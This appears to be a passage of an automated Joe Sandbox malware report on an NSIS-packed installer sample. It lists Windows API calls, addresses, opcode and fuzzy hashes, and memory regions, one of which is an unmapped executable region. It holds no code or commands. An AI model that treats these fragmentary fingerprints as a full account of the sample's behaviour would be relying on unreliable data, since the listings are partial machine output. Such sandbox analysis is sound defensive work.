                            • API ID: Char$Next$Prev
                            • String ID: *?|<>/":
                            • API String ID: 589700163-165019052
                            • Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                            • Instruction ID: 9cd3e807bb29f508aa56cad56700fba7970b0901ce3b2fdefae83793710aaee6
                            • Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                            • Instruction Fuzzy Hash: 1411E26180479129EB327A385C40BB76FD84F57764F1A04FFE8C6722C2C67C5C6292AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: $q$$q$$q$$q$$q$$q
                            • API String ID: 0-2069967915
                            • Opcode ID: 707af274724a6e70989fc1c57a11a9e5540bcae3dff40d567af5f72abf0f28c9
                            • Instruction ID: 405717e218b630fcbfd3430ff0e13221dffd2e61269eb1400af21d1f89c9bd6f
                            • Opcode Fuzzy Hash: 707af274724a6e70989fc1c57a11a9e5540bcae3dff40d567af5f72abf0f28c9
                            • Instruction Fuzzy Hash: 54F14C34B01205DFEB19EBA4C594B5EB7B3BF98340F258529E405AB355DB76EC82CB80
                            APIs
                            • lstrcatA.KERNEL32(00000000,00000000,0040A418,00435800,00000000,00000000,00000031), ref: 00401798
                            • CompareFileTime.KERNEL32(-00000014,?,0040A418,0040A418,00000000,00000000,0040A418,00435800,00000000,00000000,00000031), ref: 004017C2
                              • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,0042EC00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                              • Part of subcall function 004050C7: lstrlenA.KERNEL32(0042A050,00000000,?,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                              • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,0042A050,00000000,?,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                              • Part of subcall function 004050C7: lstrcatA.KERNEL32(0042A050,004030F7,004030F7,0042A050,00000000,?,75A823A0), ref: 00405123
                              • Part of subcall function 004050C7: SetWindowTextA.USER32(0042A050,0042A050), ref: 00405135
                              • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                              • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                              • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                            • String ID:
                            • API String ID: 1941528284-0
                            • Opcode ID: ec066fc1f791a28a9f0325cd86f74f0af079f58842eee79025982aaa23838273
                            • Instruction ID: 9917b4e32c30e3d06e99a245a18197bb2030eb542a9362b48aff858cdbf0b6bf
                            • Opcode Fuzzy Hash: ec066fc1f791a28a9f0325cd86f74f0af079f58842eee79025982aaa23838273
                            • Instruction Fuzzy Hash: C541A571A00515BACF107BA5CD45EAF3678EF45368F60823FF421F20E1D67C8A418AAE
                            APIs
                            • GetDC.USER32(?), ref: 00401D9E
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
                            • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                            • CreateFontIndirectA.GDI32(0040B818), ref: 00401E20
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CapsCreateDeviceFontIndirectRelease
                            • String ID:
                            • API String ID: 3808545654-0
                            • Opcode ID: e66b643645ae5869d7f803f1a931f06999308b12a2e1552bce617188d2388566
                            • Instruction ID: 674523e5e9bad331ced951479310ecf0af1814540c8bb9a1260b3d2be645706a
                            • Opcode Fuzzy Hash: e66b643645ae5869d7f803f1a931f06999308b12a2e1552bce617188d2388566
                            • Instruction Fuzzy Hash: 49017972944240AFD7006BB4AE5ABA93FF8DB59305F108439F141B61F2CB790445CF9D
                            APIs
                            • GetDlgItem.USER32(?), ref: 00401D45
                            • GetClientRect.USER32(00000000,?), ref: 00401D52
                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
                            • DeleteObject.GDI32(00000000), ref: 00401D90
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                            • String ID:
                            • API String ID: 1849352358-0
                            • Opcode ID: 0eb514b26757c14dfc9e7ab691bd09cd0abb996a20804aaa0a787f0dfa13f32e
                            • Instruction ID: 19d294cafef6034250738095af8a4c7efea52b5f5fc7e0a3d6f731340b14d26e
                            • Opcode Fuzzy Hash: 0eb514b26757c14dfc9e7ab691bd09cd0abb996a20804aaa0a787f0dfa13f32e
                            • Instruction Fuzzy Hash: EAF0ECB2600515AFDB00ABA4DE89DAFB7BCEB44305B04447AF641F2191CA748D018B38
                            APIs
                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend$Timeout
                            • String ID: !
                            • API String ID: 1777923405-2657877971
                            • Opcode ID: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                            • Instruction ID: 6061c88af419790da573c0436b06ac7d5ed1a9fd9516c3c4f7c631bff8e6d743
                            • Opcode Fuzzy Hash: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                            • Instruction Fuzzy Hash: 2621A271E44209BEEF15DFA5D986AAE7BB4EF84304F24843EF501B61D0CB7885418F28
                            APIs
                            • lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                            • wsprintfA.USER32 ref: 0040492E
                            • SetDlgItemTextA.USER32(?,0042A870), ref: 00404941
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: ItemTextlstrlenwsprintf
                            • String ID: %u.%u%s%s
                            • API String ID: 3540041739-3551169577
                            • Opcode ID: 3c4f388065fd84cb694f5cf3247e00f86c36fc154983ed31d8b13ba5f8e83c02
                            • Instruction ID: 1010f8f0fc76c68cf0e8b2cd769f4e8eee9817d82106679565c36b77a1653ccb
                            • Opcode Fuzzy Hash: 3c4f388065fd84cb694f5cf3247e00f86c36fc154983ed31d8b13ba5f8e83c02
                            • Instruction Fuzzy Hash: FB110677A042282BEB00656D9C41EAF3698DB81334F25463BFA65F21D1E978CC1242E9
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,?,000000F0), ref: 0040202E
                              • Part of subcall function 004050C7: lstrlenA.KERNEL32(0042A050,00000000,?,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                              • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,0042A050,00000000,?,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                              • Part of subcall function 004050C7: lstrcatA.KERNEL32(0042A050,004030F7,004030F7,0042A050,00000000,?,75A823A0), ref: 00405123
                              • Part of subcall function 004050C7: SetWindowTextA.USER32(0042A050,0042A050), ref: 00405135
                              • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                              • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                              • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                            • LoadLibraryExA.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040203E
                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 004020B8
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                            • String ID:
                            • API String ID: 2987980305-0
                            • Opcode ID: 490571eaf18eb528810bd7303bcbaa8e0b92f898ddca79ec3151c5cc349cda19
                            • Instruction ID: c1ae46b168e5b47a3396f215b5b678e2f7e13ad55da110dce54edd367ac60368
                            • Opcode Fuzzy Hash: 490571eaf18eb528810bd7303bcbaa8e0b92f898ddca79ec3151c5cc349cda19
                            • Instruction Fuzzy Hash: D221C671A00215ABCF207FA48F4DBAE7A70AB54319F60413BE601B21D0CBBD49429A6E
                            APIs
                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Close$Enum
                            • String ID:
                            • API String ID: 464197530-0
                            • Opcode ID: 6c5bd0e34eef19a3a2ab9834a7226b1c5a8bd41f7ddf1dd46113ff98e1d6fe90
                            • Instruction ID: bf26dd322600c86e705ae03821e5e95be148f4b98a6ddde11b8b46473537de7c
                            • Opcode Fuzzy Hash: 6c5bd0e34eef19a3a2ab9834a7226b1c5a8bd41f7ddf1dd46113ff98e1d6fe90
                            • Instruction Fuzzy Hash: 0E115832504109FBEF129F90CF09F9E7B69AB08380F104076BD45B51E0EBB59E11AAA8
                            APIs
                            • CreateDirectoryA.KERNEL32(?,?,00436400), ref: 004055D0
                            • GetLastError.KERNEL32 ref: 004055E4
                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055F9
                            • GetLastError.KERNEL32 ref: 00405603
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                            • String ID:
                            • API String ID: 3449924974-0
                            • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                            • Instruction ID: 31ed81618c477e33f581cc85a0b23cfa0e691b84649e5a94383732ec19bc7550
                            • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                            • Instruction Fuzzy Hash: 4E011A71C00219EADF109FA1C9047EFBBB8EF14355F10803AD545B6290DB799609CFA9
                            APIs
                            • DestroyWindow.USER32(?,00000000,00402EDF,?), ref: 00402D12
                            • GetTickCount.KERNEL32 ref: 00402D30
                            • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
                            • ShowWindow.USER32(00000000,00000005), ref: 00402D5B
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                            • String ID:
                            • API String ID: 2102729457-0
                            • Opcode ID: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                            • Instruction ID: beb49624fd26f69101be82d244f2f6f966a121381cf6cbe5bc22d12f3c535a1a
                            • Opcode Fuzzy Hash: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
                            • Instruction Fuzzy Hash: A0F05E30601621ABC7317B64FE4CA8F7AA4AB18B12751047AF148B21F4CB7848C28BAC
                            APIs
                            • IsWindowVisible.USER32(?), ref: 0040506A
                            • CallWindowProcA.USER32(?,?,?,?), ref: 004050BB
                              • Part of subcall function 0040408B: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040409D
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Window$CallMessageProcSendVisible
                            • String ID:
                            • API String ID: 3748168415-3916222277
                            • Opcode ID: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                            • Instruction ID: 78b8b48c00cf9c642473ee3ff4bb8652c0e006dd03d895f02bd3b5106f733cf3
                            • Opcode Fuzzy Hash: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
                            • Instruction Fuzzy Hash: AA015E71200608AFDF205F11DD80A6F37A5EB84750F14443AFA41B51D1D73A8C929EAA
                            APIs
                            • GetTickCount.KERNEL32 ref: 00405B7C
                            • GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B96
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CountFileNameTempTick
                            • String ID: nsa
                            • API String ID: 1716503409-2209301699
                            • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                            • Instruction ID: 343f4ea9f9204f9b983ce224a42535e265f7560d01468737dbca66c928219fc6
                            • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                            • Instruction Fuzzy Hash: 59F0A7363082087BDB108F56DD04B9B7BADDF91750F10803BFA48DB290D6B4E9548B58
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: $q$$q$$q$$q
                            • API String ID: 0-4102054182
                            • Opcode ID: f751d4eed217474a3cf410a830a410362cdb7fb066f607691c741a1771936d69
                            • Instruction ID: 87ca1782d977dd45e1602a04ee824ad9b69b0485b3e7a9db8049eebb38091ad2
                            • Opcode Fuzzy Hash: f751d4eed217474a3cf410a830a410362cdb7fb066f607691c741a1771936d69
                            • Instruction Fuzzy Hash: 9DB13E34A01209DBEB18DFA5C590B9EB7F2EF88311F25852AD4169B355DB76DC82CB80
                            APIs
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 00405668
                            • CloseHandle.KERNEL32(?), ref: 00405675
                            Strings
                            • Error launching installer, xrefs: 00405652
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CloseCreateHandleProcess
                            • String ID: Error launching installer
                            • API String ID: 3712363035-66219284
                            • Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                            • Instruction ID: cd0db04dc70eb2db95c0507bc2818c98f3fa4352d1ad4fdf37015ca79918bc5c
                            • Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                            • Instruction Fuzzy Hash: 2FE046F0640209BFEB109FB0EE49F7F7AADEB00704F404561BD00F2190EA7498088A7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: LRq$LRq$$q$$q
                            • API String ID: 0-2204215535
                            • Opcode ID: d3d90114dce50a874767f98ec3368c43eac4a6f59ad2cf909dff9a3f95aa099e
                            • Instruction ID: d42317817e57947a6667ff27f2e08a8fd0b31d7fdbdbdad40760417e803bc7ac
                            • Opcode Fuzzy Hash: d3d90114dce50a874767f98ec3368c43eac4a6f59ad2cf909dff9a3f95aa099e
                            • Instruction Fuzzy Hash: D351A034700305EFEB18DB68C891B6AB7E2BF89311F24856AE5019B361DB32EC41CB90
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: $q$$q$$q$$q
                            • API String ID: 0-4102054182
                            • Opcode ID: 5a8b9887ca01de90d5789c3af39054087c315e780312bba7d5f1cf5e70f77f8a
                            • Instruction ID: 64ee46771caff9761f856d573d1c6365cdc7b496417c8e0a191646aa296a3dba
                            • Opcode Fuzzy Hash: 5a8b9887ca01de90d5789c3af39054087c315e780312bba7d5f1cf5e70f77f8a
                            • Instruction Fuzzy Hash: 3C516534A00209EFDB19DB64C890A9E77B2FF85350FA4492EE805D7355DB32EC42CB91
                            APIs
                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AC6
                            • CharNextA.USER32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AD7
                            • lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: lstrlen$CharNextlstrcmpi
                            • String ID:
                            • API String ID: 190613189-0
                            • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                            • Instruction ID: 2b94cf21fc0d9439dbab8b822db930a3447ea2d2cb1db815078a5a090280caf9
                            • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                            • Instruction Fuzzy Hash: 6DF0C231201918AFCB02DBA8CD4099FBBA8EF06350B2540B9E841F7211D674EE01AFA9